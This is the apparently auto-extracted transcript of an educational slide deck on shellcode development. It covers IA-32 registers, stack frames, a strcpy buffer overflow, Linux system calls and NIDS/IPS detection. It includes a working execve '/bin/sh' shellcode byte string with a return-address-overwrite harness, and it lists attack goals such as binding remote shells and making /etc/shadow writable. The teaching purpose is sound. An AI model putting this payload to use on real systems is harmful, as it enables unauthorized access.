shellcode development -femi oloyede -pallavi murudkar
TRANSCRIPT
Shellcode Shellcode DevelopmentDevelopment
-Femi Oloyede-Femi Oloyede
-Pallavi Murudkar-Pallavi Murudkar
AgendaAgenda
IntroductionIntroduction What can Shellcode do?What can Shellcode do? Tools for Shellcode DevelopmentTools for Shellcode Development Understanding ShellcodeUnderstanding Shellcode Developing ShellcodeDeveloping Shellcode Methods of Detecting ShellcodeMethods of Detecting Shellcode
IntroductionIntroduction
Shellcode is defined as a set of instructions Shellcode is defined as a set of instructions injected and then executed by an exploited injected and then executed by an exploited programprogram
Shellcodes are primarily used to exploit Shellcodes are primarily used to exploit buffer overflowsbuffer overflows
The most important task when creating The most important task when creating shellcode is to make it small and executableshellcode is to make it small and executable
What can Shellcode do?What can Shellcode do?
Providing access to the attacked systemProviding access to the attacked system
Spawning /bin/sh [or] cmd.exe (local shell)Spawning /bin/sh [or] cmd.exe (local shell)
Binding a shell to a port (remote shell)Binding a shell to a port (remote shell)
Adding root/admin user to the systemAdding root/admin user to the system
Chmod()’ing /etc/shadow to be writeableChmod()’ing /etc/shadow to be writeable
Tools for Shellcode Tools for Shellcode developmentdevelopment
Nasm Used to write assembly codeNasm Used to write assembly code
Gdb GNU debugger to analyze core dump filesGdb GNU debugger to analyze core dump files
Objdump To disassemble fileObjdump To disassemble file
Ktrace Trace all system calls a process is usingKtrace Trace all system calls a process is using
Next ( Femi )
Understanding ShellcodeUnderstanding Shellcode
Developing ShellcodeDeveloping Shellcode
Methods of Detecting ShellcodeMethods of Detecting Shellcode
Understanding Shellcode
IA-32 Machine Architecture (instruction set & registers)
Program Flow dynamics - Processes Memory Organization and context switching during function-calls and interrupt processing.
Shellcode is injected via the modification of the return address of a function by way of a stack-based buffer overflow.
Machine Architecture
Refer to IA-32 Intel® Architecture Software Developer's Manual Volume 1: Basic Architecture”
A large amount of computer software supports the platform, including operating systems such as MS-DOS, Windows, Linux, BSD, Solaris, and Mac OS X.
EBP Base pointer. Primarily used to hold the address of the current stack frame. Also sometimes used as a general data or address register.
ESI General register or "source index" for string operations. Also has a one-byte LODS[size] instruction for loading data from memory to the accumulator.
EDI General register or "destination index" for string operations. Also has a one-byte STOS[size] instruction to write data out of the accumulator.
ESP Stack pointer. Is used to hold the top address of the stack.
EIP Instruction pointer. Holds the current instruction address.
Program Flow Dynamics
Text Area
Initialized and Un-initialized Data Area
Stack
Lower memory address
Higher memory address
void A(int a, int b, int c) { char buffer1[5]; char buffer2[10]; } void main() { A (1, 2, 3); return 0; }
pushl $3 pushl $2 pushl $1 call function pushl %ebp movl %esp,%ebp subl $20,%esp
C code Assembly Code
Program Flow Dynamics (cont)
EBP (Base or frame Pointer) [mov1 $esp, %ebp]
SFP b a RET Buffer1 Buffer2 c
4 4 4 4 bytes
8 12 4
Bottom of Stack
Top of Stack
Address of previous frame pointer [push %ebp]
Address of ‘return 0’ instruction of main
ESP (Stack Pointer) [sub1 $20, %esp]
EIP (Instruction Pointer) Address of last instruction in A
Stack Based Buffer Overflow
void A(char charPtr *str) { char buffer[4]; strcpy(buffer,str);}
void main() { char BigggerString[12] = “AAAAAAAAAAAA”; A(Biggerstring);}
SFP (4) charPtrRET (4)Buffer1 (4)
AAAA AAAAAAAA
Bottom of Stack
Top of Stack
Stack Buffer Overflow
Developing Shellcode
Finding the Vulnerability Writing the Shellcode
Shellcode is sequence of machine instructions or opcode.
To take advantage of the injected code and to gain access to the target system, system calls must be used
On Linux there are two ways of implementing a system call, they are icall87/icall27 gates and ‘INT 0x80’ software interrupts
Example – Spawning a Shell
Write C code Extract the assembly code Extract the opcode Append an function exit
opcodes to allow the function exit gracefully
Initialize a buffer with the opcode.
#include <stdio.h> void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); }
Example – Spawning a Shell cont’
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main() { int *retPtr; retPtr = (int *)&ret + 2; (*retPtr) = (int) shellcode; }
SFP (4) RET (4) retPtr (4)
Address of
shellcode Buffer
bu
Address of this + 2 words
Bottom of Stack
Top of Stack
…
Methods for Detecting Shellcode
NIDS (Network Intrusion Detection System) can be used to identify shellcode on the wire using Signature databases and Protocol analysis methods
IPS (Intrusion Prevention System) identifies shellcode by running the code on a sandbox/virtualization in order to detect if the given code is malicious or not
Conclusion
Shellcode is a powerful mechanism for the exploitation of software vulnerabilities.
It is important that the shellcode developed is small in size
Shellcode can be employed to automate software security tests, where the shellcode is written to expose and draw attention to security holes
Questions?